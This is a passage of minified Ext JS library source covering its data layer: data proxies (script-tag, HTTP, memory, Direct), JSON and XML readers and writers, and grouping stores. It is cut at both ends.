a.push({name:d, value:c})
}, this);
return a
}};
Ext.data.DataProxy = function (a) {
a = a || {};
this.api = a.api;
this.url = a.url;
this.restful = a.restful;
this.listeners = a.listeners;
this.prettyUrls = a.prettyUrls;
this.addEvents("exception", "beforeload", "load", "loadexception", "beforewrite", "write");
Ext.data.DataProxy.superclass.constructor.call(this);
try {
Ext.data.Api.prepare(this)
} catch (b) {
if (b instanceof Ext.data.Api.Error) {
b.toConsole()
}
}
Ext.data.DataProxy.relayEvents(this, ["beforewrite", "write", "exception"])
};
Ext.extend(Ext.data.DataProxy, Ext.util.Observable, {restful:false, setApi:function () {
if (arguments.length == 1) {
var a = Ext.data.Api.isValid(arguments[0]);
if (a === true) {
this.api = arguments[0]
} else {
throw new Ext.data.Api.Error("invalid", a)
}
} else {
if (arguments.length == 2) {
if (!Ext.data.Api.isAction(arguments[0])) {
throw new Ext.data.Api.Error("invalid", arguments[0])
}
this.api[arguments[0]] = arguments[1]
}
}
Ext.data.Api.prepare(this)
}, isApiAction:function (a) {
return(this.api[a]) ? true : false
}, request:function (e, b, g, a, h, d, c) {
if (!this.api[e] && !this.load) {
throw new Ext.data.DataProxy.Error("action-undefined", e)
}
g = g || {};
if ((e === Ext.data.Api.actions.read) ? this.fireEvent("beforeload", this, g) : this.fireEvent("beforewrite", this, e, b, g) !== false) {
this.doRequest.apply(this, arguments)
} else {
h.call(d || this, null, c, false)
}
}, load:null, doRequest:function (e, b, g, a, h, d, c) {
this.load(g, a, h, d, c)
}, onRead:Ext.emptyFn, onWrite:Ext.emptyFn, buildUrl:function (d, b) {
b = b || null;
var c = (this.conn && this.conn.url) ? this.conn.url : (this.api[d]) ? this.api[d].url : this.url;
if (!c) {
throw new Ext.data.Api.Error("invalid-url", d)
}
var e = null;
var a = c.match(/(.*)(\.json|\.xml|\.html)$/);
if (a) {
e = a[2];
c = a[1]
}
if ((this.restful === true || this.prettyUrls === true) && b instanceof Ext.data.Record && !b.phantom) {
c += "/" + b.id
}
return(e === null) ? c : c + e
}, destroy:function () {
this.purgeListeners()
}});
Ext.apply(Ext.data.DataProxy, Ext.util.Observable.prototype);
Ext.util.Observable.call(Ext.data.DataProxy);
Ext.data.DataProxy.Error = Ext.extend(Ext.Error, {constructor:function (b, a) {
this.arg = a;
Ext.Error.call(this, b)
}, name:"Ext.data.DataProxy"});
Ext.apply(Ext.data.DataProxy.Error.prototype, {lang:{"action-undefined":"DataProxy attempted to execute an API-action but found an undefined url / function. Please review your Proxy url/api-configuration.", "api-invalid":"Recieved an invalid API-configuration. Please ensure your proxy API-configuration contains only the actions from Ext.data.Api.actions."}});
Ext.data.Request = function (a) {
Ext.apply(this, a)
};
Ext.data.Request.prototype = {action:undefined, rs:undefined, params:undefined, callback:Ext.emptyFn, scope:undefined, reader:undefined};
Ext.data.Response = function (a) {
Ext.apply(this, a)
};
Ext.data.Response.prototype = {action:undefined, success:undefined, message:undefined, data:undefined, raw:undefined, records:undefined};
Ext.data.ScriptTagProxy = function (a) {
Ext.apply(this, a);
Ext.data.ScriptTagProxy.superclass.constructor.call(this, a);
this.head = document.getElementsByTagName("head")[0]
};
Ext.data.ScriptTagProxy.TRANS_ID = 1000;
Ext.extend(Ext.data.ScriptTagProxy, Ext.data.DataProxy, {timeout:30000, callbackParam:"callback", nocache:true, doRequest:function (e, g, d, h, j, k, l) {
var c = Ext.urlEncode(Ext.apply(d, this.extraParams));
var b = this.buildUrl(e, g);
if (!b) {
throw new Ext.data.Api.Error("invalid-url", b)
}
b = Ext.urlAppend(b, c);
if (this.nocache) {
b = Ext.urlAppend(b, "_dc=" + (new Date().getTime()))
}
var a = ++Ext.data.ScriptTagProxy.TRANS_ID;
var m = {id:a, action:e, cb:"stcCallback" + a, scriptId:"stcScript" + a, params:d, arg:l, url:b, callback:j, scope:k, reader:h};
window[m.cb] = this.createCallback(e, g, m);
b += String.format("&{0}={1}", this.callbackParam, m.cb);
if (this.autoAbort !== false) {
this.abort()
}
m.timeoutId = this.handleFailure.defer(this.timeout, this, [m]);
var i = document.createElement("script");
i.setAttribute("src", b);
i.setAttribute("type", "text/javascript");
i.setAttribute("id", m.scriptId);
this.head.appendChild(i);
this.trans = m
}, createCallback:function (d, b, c) {
var a = this;
return function (e) {
a.trans = false;
a.destroyTrans(c, true);
if (d === Ext.data.Api.actions.read) {
a.onRead.call(a, d, c, e)
} else {
a.onWrite.call(a, d, c, e, b)
}
}
}, onRead:function (d, c, b) {
var a;
try {
a = c.reader.readRecords(b)
} catch (g) {
this.fireEvent("loadexception", this, c, b, g);
this.fireEvent("exception", this, "response", d, c, b, g);
c.callback.call(c.scope || window, null, c.arg, false);
return
}
if (a.success === false) {
this.fireEvent("loadexception", this, c, b);
this.fireEvent("exception", this, "remote", d, c, b, null)
} else {
this.fireEvent("load", this, b, c.arg)
}
c.callback.call(c.scope || window, a, c.arg, a.success)
}, onWrite:function (h, g, c, b) {
var a = g.reader;
try {
var d = a.readResponse(h, c)
} catch (i) {
this.fireEvent("exception", this, "response", h, g, d, i);
g.callback.call(g.scope || window, null, d, false);
return
}
if (!d.success === true) {
this.fireEvent("exception", this, "remote", h, g, d, b);
g.callback.call(g.scope || window, null, d, false);
return
}
this.fireEvent("write", this, h, d.data, d, b, g.arg);
g.callback.call(g.scope || window, d.data, d, true)
}, isLoading:function () {
return this.trans ? true : false
}, abort:function () {
if (this.isLoading()) {
this.destroyTrans(this.trans)
}
}, destroyTrans:function (b, a) {
this.head.removeChild(document.getElementById(b.scriptId));
clearTimeout(b.timeoutId);
if (a) {
window[b.cb] = undefined;
try {
delete window[b.cb]
} catch (c) {
}
} else {
window[b.cb] = function () {
window[b.cb] = undefined;
try {
delete window[b.cb]
} catch (d) {
}
}
}
}, handleFailure:function (a) {
this.trans = false;
this.destroyTrans(a, false);
if (a.action === Ext.data.Api.actions.read) {
this.fireEvent("loadexception", this, null, a.arg)
}
this.fireEvent("exception", this, "response", a.action, {response:null, options:a.arg});
a.callback.call(a.scope || window, null, a.arg, false)
}, destroy:function () {
this.abort();
Ext.data.ScriptTagProxy.superclass.destroy.call(this)
}});
Ext.data.HttpProxy = function (a) {
Ext.data.HttpProxy.superclass.constructor.call(this, a);
this.conn = a;
this.conn.url = null;
this.useAjax = !a || !a.events;
var c = Ext.data.Api.actions;
this.activeRequest = {};
for (var b in c) {
this.activeRequest[c[b]] = undefined
}
};
Ext.extend(Ext.data.HttpProxy, Ext.data.DataProxy, {getConnection:function () {
return this.useAjax ? Ext.Ajax : this.conn
}, setUrl:function (a, b) {
this.conn.url = a;
if (b === true) {
this.url = a;
this.api = null;
Ext.data.Api.prepare(this)
}
}, doRequest:function (g, d, i, c, b, e, a) {
var h = {method:(this.api[g]) ? this.api[g]["method"] : undefined, request:{callback:b, scope:e, arg:a}, reader:c, callback:this.createCallback(g, d), scope:this};
if (i.jsonData) {
h.jsonData = i.jsonData
} else {
if (i.xmlData) {
h.xmlData = i.xmlData
} else {
h.params = i || {}
}
}
this.conn.url = this.buildUrl(g, d);
if (this.useAjax) {
Ext.applyIf(h, this.conn);
if (this.activeRequest[g]) {
}
this.activeRequest[g] = Ext.Ajax.request(h)
} else {
this.conn.request(h)
}
this.conn.url = null
}, createCallback:function (b, a) {
return function (e, d, c) {
this.activeRequest[b] = undefined;
if (!d) {
if (b === Ext.data.Api.actions.read) {
this.fireEvent("loadexception", this, e, c)
}
this.fireEvent("exception", this, "response", b, e, c);
e.request.callback.call(e.request.scope, null, e.request.arg, false);
return
}
if (b === Ext.data.Api.actions.read) {
this.onRead(b, e, c)
} else {
this.onWrite(b, e, c, a)
}
}
}, onRead:function (d, h, b) {
var a;
try {
a = h.reader.read(b)
} catch (g) {
this.fireEvent("loadexception", this, h, b, g);
this.fireEvent("exception", this, "response", d, h, b, g);
h.request.callback.call(h.request.scope, null, h.request.arg, false);
return
}
if (a.success === false) {
this.fireEvent("loadexception", this, h, b);
var c = h.reader.readResponse(d, b);
this.fireEvent("exception", this, "remote", d, h, c, null)
} else {
this.fireEvent("load", this, h, h.request.arg)
}
h.request.callback.call(h.request.scope, a, h.request.arg, a.success)
}, onWrite:function (g, i, c, b) {
var a = i.reader;
var d;
try {
d = a.readResponse(g, c)
} catch (h) {
this.fireEvent("exception", this, "response", g, i, c, h);
i.request.callback.call(i.request.scope, null, i.request.arg, false);
return
}
if (d.success === true) {
this.fireEvent("write", this, g, d.data, d, b, i.request.arg)
} else {
this.fireEvent("exception", this, "remote", g, i, d, b)
}
i.request.callback.call(i.request.scope, d.data, d, d.success)
}, destroy:function () {
if (!this.useAjax) {
this.conn.abort()
} else {
if (this.activeRequest) {
var b = Ext.data.Api.actions;
for (var a in b) {
if (this.activeRequest[b[a]]) {
Ext.Ajax.abort(this.activeRequest[b[a]])
}
}
}
}
Ext.data.HttpProxy.superclass.destroy.call(this)
}});
Ext.data.MemoryProxy = function (b) {
var a = {};
a[Ext.data.Api.actions.read] = true;
Ext.data.MemoryProxy.superclass.constructor.call(this, {api:a});
this.data = b
};
Ext.extend(Ext.data.MemoryProxy, Ext.data.DataProxy, {doRequest:function (b, c, a, d, h, i, j) {
a = a || {};
var k;
try {
k = d.readRecords(this.data)
} catch (g) {
this.fireEvent("loadexception", this, null, j, g);
this.fireEvent("exception", this, "response", b, j, null, g);
h.call(i, null, j, false);
return
}
h.call(i, k, j, true)
}});
Ext.data.Types = new function () {
var a = Ext.data.SortTypes;
Ext.apply(this, {stripRe:/[\$,%]/g, AUTO:{convert:function (b) {
return b
}, sortType:a.none, type:"auto"}, STRING:{convert:function (b) {
return(b === undefined || b === null) ? "" : String(b)
}, sortType:a.asUCString, type:"string"}, INT:{convert:function (b) {
return b !== undefined && b !== null && b !== "" ? parseInt(String(b).replace(Ext.data.Types.stripRe, ""), 10) : (this.useNull ? null : 0)
}, sortType:a.none, type:"int"}, FLOAT:{convert:function (b) {
return b !== undefined && b !== null && b !== "" ? parseFloat(String(b).replace(Ext.data.Types.stripRe, ""), 10) : (this.useNull ? null : 0)
}, sortType:a.none, type:"float"}, BOOL:{convert:function (b) {
return b === true || b === "true" || b == 1
}, sortType:a.none, type:"bool"}, DATE:{convert:function (c) {
var d = this.dateFormat;
if (!c) {
return null
}
if (Ext.isDate(c)) {
return c
}
if (d) {
if (d == "timestamp") {
return new Date(c * 1000)
}
if (d == "time") {
return new Date(parseInt(c, 10))
}
return Date.parseDate(c, d)
}
var b = Date.parse(c);
return b ? new Date(b) : null
}, sortType:a.asDate, type:"date"}});
Ext.apply(this, {BOOLEAN:this.BOOL, INTEGER:this.INT, NUMBER:this.FLOAT})
};
Ext.data.JsonWriter = Ext.extend(Ext.data.DataWriter, {encode:true, encodeDelete:false, constructor:function (a) {
Ext.data.JsonWriter.superclass.constructor.call(this, a)
}, render:function (c, d, b) {
if (this.encode === true) {
Ext.apply(c, d);
c[this.meta.root] = Ext.encode(b)
} else {
var a = Ext.apply({}, d);
a[this.meta.root] = b;
c.jsonData = a
}
}, createRecord:function (a) {
return this.toHash(a)
}, updateRecord:function (a) {
return this.toHash(a)
}, destroyRecord:function (b) {
if (this.encodeDelete) {
var a = {};
a[this.meta.idProperty] = b.id;
return a
} else {
return b.id
}
}});
Ext.data.JsonReader = function (a, b) {
a = a || {};
Ext.applyIf(a, {idProperty:"id", successProperty:"success", totalProperty:"total"});
Ext.data.JsonReader.superclass.constructor.call(this, a, b || a.fields)
};
Ext.extend(Ext.data.JsonReader, Ext.data.DataReader, {read:function (a) {
var b = a.responseText;
var c = Ext.decode(b);
if (!c) {
throw {message:"JsonReader.read: Json object not found"}
}
return this.readRecords(c)
}, readResponse:function (e, b) {
var h = (b.responseText !== undefined) ? Ext.decode(b.responseText) : b;
if (!h) {
throw new Ext.data.JsonReader.Error("response")
}
var a = this.getRoot(h), g = this.getSuccess(h);
if (g && e === Ext.data.Api.actions.create) {
var d = Ext.isDefined(a);
if (d && Ext.isEmpty(a)) {
throw new Ext.data.JsonReader.Error("root-empty", this.meta.root)
} else {
if (!d) {
throw new Ext.data.JsonReader.Error("root-undefined-response", this.meta.root)
}
}
}
var c = new Ext.data.Response({action:e, success:g, data:(a) ? this.extractData(a, false) : [], message:this.getMessage(h), raw:h});
if (Ext.isEmpty(c.success)) {
throw new Ext.data.JsonReader.Error("successProperty-response", this.meta.successProperty)
}
return c
}, readRecords:function (a) {
this.jsonData = a;
if (a.metaData) {
this.onMetaChange(a.metaData)
}
var m = this.meta, h = this.recordType, b = h.prototype.fields, l = b.items, i = b.length, j;
var g = this.getRoot(a), e = g.length, d = e, k = true;
if (m.totalProperty) {
j = parseInt(this.getTotal(a), 10);
if (!isNaN(j)) {
d = j
}
}
if (m.successProperty) {
j = this.getSuccess(a);
if (j === false || j === "false") {
k = false
}
}
return{success:k, records:this.extractData(g, true), totalRecords:d}
}, buildExtractors:function () {
if (this.ef) {
return
}
var l = this.meta, h = this.recordType, e = h.prototype.fields, k = e.items, j = e.length;
if (l.totalProperty) {
this.getTotal = this.createAccessor(l.totalProperty)
}
if (l.successProperty) {
this.getSuccess = this.createAccessor(l.successProperty)
}
if (l.messageProperty) {
this.getMessage = this.createAccessor(l.messageProperty)
}
this.getRoot = l.root ? this.createAccessor(l.root) : function (g) {
return g
};
if (l.id || l.idProperty) {
var d = this.createAccessor(l.id || l.idProperty);
this.getId = function (i) {
var g = d(i);
return(g === undefined || g === "") ? null : g
}
} else {
this.getId = function () {
return null
}
}
var c = [];
for (var b = 0; b < j; b++) {
e = k[b];
var a = (e.mapping !== undefined && e.mapping !== null) ? e.mapping : e.name;
c.push(this.createAccessor(a))
}
this.ef = c
}, simpleAccess:function (b, a) {
return b[a]
}, createAccessor:function () {
var a = /[\[\.]/;
return function (c) {
if (Ext.isEmpty(c)) {
return Ext.emptyFn
}
if (Ext.isFunction(c)) {
return c
}
var b = String(c).search(a);
if (b >= 0) {
return new Function("obj", "return obj" + (b > 0 ? "." : "") + c)
}
return function (d) {
return d[c]
}
}
}(), extractValues:function (h, d, a) {
var g, c = {};
for (var e = 0; e < a; e++) {
g = d[e];
var b = this.ef[e](h);
c[g.name] = g.convert((b !== undefined) ? b : g.defaultValue, h)
}
return c
}});
Ext.data.JsonReader.Error = Ext.extend(Ext.Error, {constructor:function (b, a) {
this.arg = a;
Ext.Error.call(this, b)
}, name:"Ext.data.JsonReader"});
Ext.apply(Ext.data.JsonReader.Error.prototype, {lang:{response:"An error occurred while json-decoding your server response", "successProperty-response":'Could not locate your "successProperty" in your server response. Please review your JsonReader config to ensure the config-property "successProperty" matches the property in your server-response. See the JsonReader docs.', "root-undefined-config":'Your JsonReader was configured without a "root" property. Please review your JsonReader config and make sure to define the root property. See the JsonReader docs.', "idProperty-undefined":'Your JsonReader was configured without an "idProperty" Please review your JsonReader configuration and ensure the "idProperty" is set (e.g.: "id"). See the JsonReader docs.', "root-empty":'Data was expected to be returned by the server in the "root" property of the response. Please review your JsonReader configuration to ensure the "root" property matches that returned in the server-response. See JsonReader docs.'}});
Ext.data.ArrayReader = Ext.extend(Ext.data.JsonReader, {readRecords:function (r) {
this.arrayData = r;
var l = this.meta, d = l ? Ext.num(l.idIndex, l.id) : null, b = this.recordType, q = b.prototype.fields, z = [], e = true, g;
var u = this.getRoot(r);
for (var y = 0, A = u.length; y < A; y++) {
var t = u[y], a = {}, p = ((d || d === 0) && t[d] !== undefined && t[d] !== "" ? t[d] : null);
for (var x = 0, m = q.length; x < m; x++) {
var B = q.items[x], w = B.mapping !== undefined && B.mapping !== null ? B.mapping : x;
g = t[w] !== undefined ? t[w] : B.defaultValue;
g = B.convert(g, t);
a[B.name] = g
}
var c = new b(a, p);
c.json = t;
z[z.length] = c
}
var h = z.length;
if (l.totalProperty) {
g = parseInt(this.getTotal(r), 10);
if (!isNaN(g)) {
h = g
}
}
if (l.successProperty) {
g = this.getSuccess(r);
if (g === false || g === "false") {
e = false
}
}
return{success:e, records:z, totalRecords:h}
}});
Ext.data.ArrayStore = Ext.extend(Ext.data.Store, {constructor:function (a) {
Ext.data.ArrayStore.superclass.constructor.call(this, Ext.apply(a, {reader:new Ext.data.ArrayReader(a)}))
}, loadData:function (e, b) {
if (this.expandData === true) {
var d = [];
for (var c = 0, a = e.length; c < a; c++) {
d[d.length] = [e[c]]
}
e = d
}
Ext.data.ArrayStore.superclass.loadData.call(this, e, b)
}});
Ext.reg("arraystore", Ext.data.ArrayStore);
Ext.data.SimpleStore = Ext.data.ArrayStore;
Ext.reg("simplestore", Ext.data.SimpleStore);
Ext.data.JsonStore = Ext.extend(Ext.data.Store, {constructor:function (a) {
Ext.data.JsonStore.superclass.constructor.call(this, Ext.apply(a, {reader:new Ext.data.JsonReader(a)}))
}});
Ext.reg("jsonstore", Ext.data.JsonStore);
Ext.data.XmlWriter = function (a) {
Ext.data.XmlWriter.superclass.constructor.apply(this, arguments);
this.tpl = (typeof(this.tpl) === "string") ? new Ext.XTemplate(this.tpl).compile() : this.tpl.compile()
};
Ext.extend(Ext.data.XmlWriter, Ext.data.DataWriter, {documentRoot:"xrequest", forceDocumentRoot:false, root:"records", xmlVersion:"1.0", xmlEncoding:"ISO-8859-15", tpl:'<tpl for="."><\u003fxml version="{version}" encoding="{encoding}"\u003f><tpl if="documentRoot"><{documentRoot}><tpl for="baseParams"><tpl for="."><{name}>{value}</{name}></tpl></tpl></tpl><tpl if="records.length>1"><{root}></tpl><tpl for="records"><{parent.record}><tpl for="."><{name}>{value}</{name}></tpl></{parent.record}></tpl><tpl if="records.length>1"></{root}></tpl><tpl if="documentRoot"></{documentRoot}></tpl></tpl>', render:function (b, c, a) {
c = this.toArray(c);
b.xmlData = this.tpl.applyTemplate({version:this.xmlVersion, encoding:this.xmlEncoding, documentRoot:(c.length > 0 || this.forceDocumentRoot === true) ? this.documentRoot : false, record:this.meta.record, root:this.root, baseParams:c, records:(Ext.isArray(a[0])) ? a : [a]})
}, createRecord:function (a) {
return this.toArray(this.toHash(a))
}, updateRecord:function (a) {
return this.toArray(this.toHash(a))
}, destroyRecord:function (b) {
var a = {};
a[this.meta.idProperty] = b.id;
return this.toArray(a)
}});
Ext.data.XmlReader = function (a, b) {
a = a || {};
Ext.applyIf(a, {idProperty:a.idProperty || a.idPath || a.id, successProperty:a.successProperty || a.success});
Ext.data.XmlReader.superclass.constructor.call(this, a, b || a.fields)
};
Ext.extend(Ext.data.XmlReader, Ext.data.DataReader, {read:function (a) {
var b = a.responseXML;
if (!b) {
throw {message:"XmlReader.read: XML Document not available"}
}
return this.readRecords(b)
}, readRecords:function (d) {
this.xmlData = d;
var a = d.documentElement || d, c = Ext.DomQuery, g = 0, e = true;
if (this.meta.totalProperty) {
g = this.getTotal(a, 0)
}
if (this.meta.successProperty) {
e = this.getSuccess(a)
}
var b = this.extractData(c.select(this.meta.record, a), true);
return{success:e, records:b, totalRecords:g || b.length}
}, readResponse:function (g, b) {
var e = Ext.DomQuery, h = b.responseXML, a = h.documentElement || h;
var c = new Ext.data.Response({action:g, success:this.getSuccess(a), message:this.getMessage(a), data:this.extractData(e.select(this.meta.record, a) || e.select(this.meta.root, a), false), raw:h});
if (Ext.isEmpty(c.success)) {
throw new Ext.data.DataReader.Error("successProperty-response", this.meta.successProperty)
}
if (g === Ext.data.Api.actions.create) {
var d = Ext.isDefined(c.data);
if (d && Ext.isEmpty(c.data)) {
throw new Ext.data.JsonReader.Error("root-empty", this.meta.root)
} else {
if (!d) {
throw new Ext.data.JsonReader.Error("root-undefined-response", this.meta.root)
}
}
}
return c
}, getSuccess:function () {
return true
}, buildExtractors:function () {
if (this.ef) {
return
}
var l = this.meta, h = this.recordType, e = h.prototype.fields, k = e.items, j = e.length;
if (l.totalProperty) {
this.getTotal = this.createAccessor(l.totalProperty)
}
if (l.successProperty) {
this.getSuccess = this.createAccessor(l.successProperty)
}
if (l.messageProperty) {
this.getMessage = this.createAccessor(l.messageProperty)
}
this.getRoot = function (g) {
return(!Ext.isEmpty(g[this.meta.record])) ? g[this.meta.record] : g[this.meta.root]
};
if (l.idPath || l.idProperty) {
var d = this.createAccessor(l.idPath || l.idProperty);
this.getId = function (g) {
var i = d(g) || g.id;
return(i === undefined || i === "") ? null : i
}
} else {
this.getId = function () {
return null
}
}
var c = [];
for (var b = 0; b < j; b++) {
e = k[b];
var a = (e.mapping !== undefined && e.mapping !== null) ? e.mapping : e.name;
c.push(this.createAccessor(a))
}
this.ef = c
}, createAccessor:function () {
var a = Ext.DomQuery;
return function (b) {
if (Ext.isFunction(b)) {
return b
}
switch (b) {
case this.meta.totalProperty:
return function (c, d) {
return a.selectNumber(b, c, d)
};
break;
case this.meta.successProperty:
return function (d, e) {
var c = a.selectValue(b, d, true);
var g = c !== false && c !== "false";
return g
};
break;
default:
return function (c, d) {
return a.selectValue(b, c, d)
};
break
}
}
}(), extractValues:function (h, d, a) {
var g, c = {};
for (var e = 0; e < a; e++) {
g = d[e];
var b = this.ef[e](h);
c[g.name] = g.convert((b !== undefined) ? b : g.defaultValue, h)
}
return c
}});
Ext.data.XmlStore = Ext.extend(Ext.data.Store, {constructor:function (a) {
Ext.data.XmlStore.superclass.constructor.call(this, Ext.apply(a, {reader:new Ext.data.XmlReader(a)}))
}});
Ext.reg("xmlstore", Ext.data.XmlStore);
Ext.data.GroupingStore = Ext.extend(Ext.data.Store, {constructor:function (d) {
d = d || {};
this.hasMultiSort = true;
this.multiSortInfo = this.multiSortInfo || {sorters:[]};
var e = this.multiSortInfo.sorters, c = d.groupField || this.groupField, b = d.sortInfo || this.sortInfo, a = d.groupDir || this.groupDir;
if (c) {
e.push({field:c, direction:a})
}
if (b) {
e.push(b)
}
Ext.data.GroupingStore.superclass.constructor.call(this, d);
this.addEvents("groupchange");
this.applyGroupField()
}, remoteGroup:false, groupOnSort:false, groupDir:"ASC", clearGrouping:function () {
this.groupField = false;
if (this.remoteGroup) {
if (this.baseParams) {
delete this.baseParams.groupBy;
delete this.baseParams.groupDir
}
var a = this.lastOptions;
if (a && a.params) {
delete a.params.groupBy;
delete a.params.groupDir
}
this.reload()
} else {
this.sort();
this.fireEvent("datachanged", this)
}
}, groupBy:function (e, a, d) {
d = d ? (String(d).toUpperCase() == "DESC" ? "DESC" : "ASC") : this.groupDir;
if (this.groupField == e && this.groupDir == d && !a) {
return
}
var c = this.multiSortInfo.sorters;
if (c.length > 0 && c[0].field == this.groupField) {
c.shift()
}
this.groupField = e;
this.groupDir = d;
this.applyGroupField();
var b = function () {
this.fireEvent("groupchange", this, this.getGroupState())
};
if (this.groupOnSort) {
this.sort(e, d);
b.call(this);
return
}
if (this.remoteGroup) {
this.on("load", b, this, {single:true});
this.reload()
} else {
this.sort(c);
b.call(this)
}
}, sort:function (h, c) {
if (this.remoteSort) {
return Ext.data.GroupingStore.superclass.sort.call(this, h, c)
}
var g = [];
if (Ext.isArray(arguments[0])) {
g = arguments[0]
} else {
if (h == undefined) {
g = this.sortInfo ? [this.sortInfo] : []
} else {
var e = this.fields.get(h);
if (!e) {
return false
}
var b = e.name, a = this.sortInfo || null, d = this.sortToggle ? this.sortToggle[b] : null;
if (!c) {
if (a && a.field == b) {
c = (this.sortToggle[b] || "ASC").toggle("ASC", "DESC")
} else {
c = e.sortDir
}
}
this.sortToggle[b] = c;
this.sortInfo = {field:b, direction:c};
g = [this.sortInfo]
}
}
if (this.groupField) {
g.unshift({direction:this.groupDir, field:this.groupField})
}
return this.multiSort.call(this, g, c)
}, applyGroupField:function () {
if (this.remoteGroup) {
if (!this.baseParams) {
this.baseParams = {}
}
Ext.apply(this.baseParams, {groupBy:this.groupField, groupDir:this.groupDir});
var a = this.lastOptions;
if (a && a.params) {
a.params.groupDir = this.groupDir;
delete a.params.groupBy
}
}
}, applyGrouping:function (a) {
if (this.groupField !== false) {
this.groupBy(this.groupField, true, this.groupDir);
return true
} else {
if (a === true) {
this.fireEvent("datachanged", this)
}
return false
}
}, getGroupState:function () {
return this.groupOnSort && this.groupField !== false ? (this.sortInfo ? this.sortInfo.field : undefined) : this.groupField
}});
Ext.reg("groupingstore", Ext.data.GroupingStore);
Ext.data.DirectProxy = function (a) {
Ext.apply(this, a);
if (typeof this.paramOrder == "string") {
this.paramOrder = this.paramOrder.split(/[\s,|]/)
}
Ext.data.DirectProxy.superclass.constructor.call(this, a)
};
Ext.extend(Ext.data.DirectProxy, Ext.data.DataProxy, {paramOrder:undefined, paramsAsHash:true, directFn:undefined, doRequest:function (b, c, a, e, k, l, n) {
var j = [], h = this.api[b] || this.directFn;
switch (b) {
case Ext.data.Api.actions.create:
j.push(a.jsonData);
break;
case Ext.data.Api.actions.read:
if (h.directCfg.method.len > 0) {
if (this.paramOrder) {
for (var d = 0, g = this.paramOrder.length; d < g; d++) {
j.push(a[this.paramOrder[d]])
}
} else {
if (this.paramsAsHash) {
j.push(a)
}
}
}
break;
case Ext.data.Api.actions.update:
j.push(a.jsonData);
break;
case Ext.data.Api.actions.destroy:
j.push(a.jsonData);
break
}
var m = {params:a || {}, request:{callback:k, scope:l, arg:n}, reader:e};
j.push(this.createCallback(b, c, m), this);
h.apply(window, j)
}, createCallback:function (d, a, b) {
var c = this;
return function (e, g) {
if (!g.status) {
if (d === Ext.data.Api.actions.read) {
c.fireEvent("loadexception", c, b, g, null)
}
c.fireEvent("exception", c, "remote", d, b, g, null);
b.request.callback.call(b.request.scope, null, b.request.arg, false);
return
}
if (d === Ext.data.Api.actions.read) {
c.onRead(d, b, e, g)
} else {
c.onWrite(d, b, e, g, a)
}
}
}, onRead:function (g, e, a, d) {
var b;
try {
b = e.reader.readRecords(a)
} catch (c) {
this.fireEvent("loadexception", this, e, d, c);
this.fireEvent("exception", this, "response", g, e, d, c);
e.request.callback.call(e.request.scope, null, e.request.arg, false);
return
}
this.fireEvent("load", this, d, e.request.arg);
e.request.callback.call(e.request.scope, b, e.request.arg, true)
}, onWrite:function (g, d, a, c, b) {
var e = d.reader.extractData(d.reader.getRoot(a), false);
var h = d.reader.getSuccess(a);
h = (h !== false);
if (h) {
this.fireEvent("write", this, g, e, c, b, d.request.arg)
} else {
this.fireEvent("exception", this, "remote", g, d, a, b)
}
d.request.callback.call(d.request.scope, e, c, h)
}});
Ext.data.DirectStore = Ext.extend(Ext.data.Store, {constructor:function (a) {
var b = Ext.apply({}, {batchTransactions:false}, a);
Ext.data.DirectStore.superclass.constructor.call(this, Ext.apply(b, {proxy:Ext.isDefined(b.proxy) ? b.proxy : new Ext.data.DirectProxy(Ext.copyTo({}, b, "paramOrder,paramsAsHash,directFn,api")), reader:(!Ext.isDefined(b.reader) && b.fields) ? new Ext.data.JsonReader(Ext.copyTo({}, b, "totalProperty,root,idProperty"), b.fields) : b.reader}))
}});
Ext.reg("directstore", Ext.data.DirectStore);
Ext.Direct = Ext.extend(Ext.util.Observable, {exceptions:{TRANSPORT:"xhr", PARSE:"parse", LOGIN:"login", SERVER:"exception"}, constructor:function () {
this.addEvents("event", "exception");
this.transactions = {};
this.providers = {}
}, addProvider:function (e) {
var c = arguments;
if (c.length > 1) {
for (var d = 0, b = c.length; d < b; d++) {
this.addProvider(c[d])
}
return
}
if (!e.events) {
e = new Ext.Direct.PROVIDERS[e.type](e)
}
e.id = e.id || Ext.id();
this.providers[e.id] = e;
e.on("data", this.onProviderData, this);
e.on("exception", this.onProviderException, this);
if (!e.isConnected()) {
e.connect()
}
return e
}, getProvider:function (a) {
return this.providers[a]
}, removeProvider:function (b) {
var a = b.id ? b : this.providers[b];
a.un("data", this.onProviderData, this);
a.un("exception", this.onProviderException, this);
delete this.providers[a.id];
return a
}, addTransaction:function (a) {
this.transactions[a.tid] = a;
return a
}, removeTransaction:function (a) {
delete this.transactions[a.tid || a];
return a
}, getTransaction:function (a) {
return this.transactions[a.tid || a]
}, onProviderData:function (d, c) {
if (Ext.isArray(c)) {
for (var b = 0, a = c.length; b < a; b++) {
this.onProviderData(d, c[b])
}
return
}
if (c.name && c.name != "event" && c.name != "exception") {
this.fireEvent(c.name, c)
} else {
if (c.type == "exception") {
this.fireEvent("exception", c)
}
}
this.fireEvent("event", c, d)
}, createEvent:function (a, b) {
return new Ext.Direct.eventTypes[a.type](Ext.apply(a, b))
}});
Ext.Direct = new Ext.Direct();
Ext.Direct.TID = 1;
Ext.Direct.PROVIDERS = {};
Ext.Direct.Transaction = function (a) {
Ext.apply(this, a);
this.tid = ++Ext.Direct.TID;
this.retryCount = 0
};
Ext.Direct.Transaction.prototype = {send:function () {
this.provider.queueTransaction(this)
}, retry:function () {
this.retryCount++;
this.send()
}, getProvider:function () {
return this.provider
}};
Ext.Direct.Event = function (a) {
Ext.apply(this, a)
};
Ext.Direct.Event.prototype = {status:true, getData:function () {
return this.data
}};
Ext.Direct.RemotingEvent = Ext.extend(Ext.Direct.Event, {type:"rpc", getTransaction:function () {
return this.transaction || Ext.Direct.getTransaction(this.tid)
}});
Ext.Direct.ExceptionEvent = Ext.extend(Ext.Direct.RemotingEvent, {status:false, type:"exception"});
Ext.Direct.eventTypes = {rpc:Ext.Direct.RemotingEvent, event:Ext.Direct.Event, exception:Ext.Direct.ExceptionEvent};
Ext.direct.Provider = Ext.extend(Ext.util.Observable, {priority:1, constructor:function (a) {
Ext.apply(this, a);
this.addEvents("connect", "disconnect", "data", "exception");
Ext.direct.Provider.superclass.constructor.call(this, a)
}, isConnected:function () {
return false
}, connect:Ext.emptyFn, disconnect:Ext.emptyFn});
Ext.direct.JsonProvider = Ext.extend(Ext.direct.Provider, {parseResponse:function (a) {
if (!Ext.isEmpty(a.responseText)) {
if (typeof a.responseText == "object") {
return a.responseText
}
return Ext.decode(a.responseText)
}
return null
}, getEvents:function (j) {
var g = null;
try {
g = this.parseResponse(j)
} catch (h) {
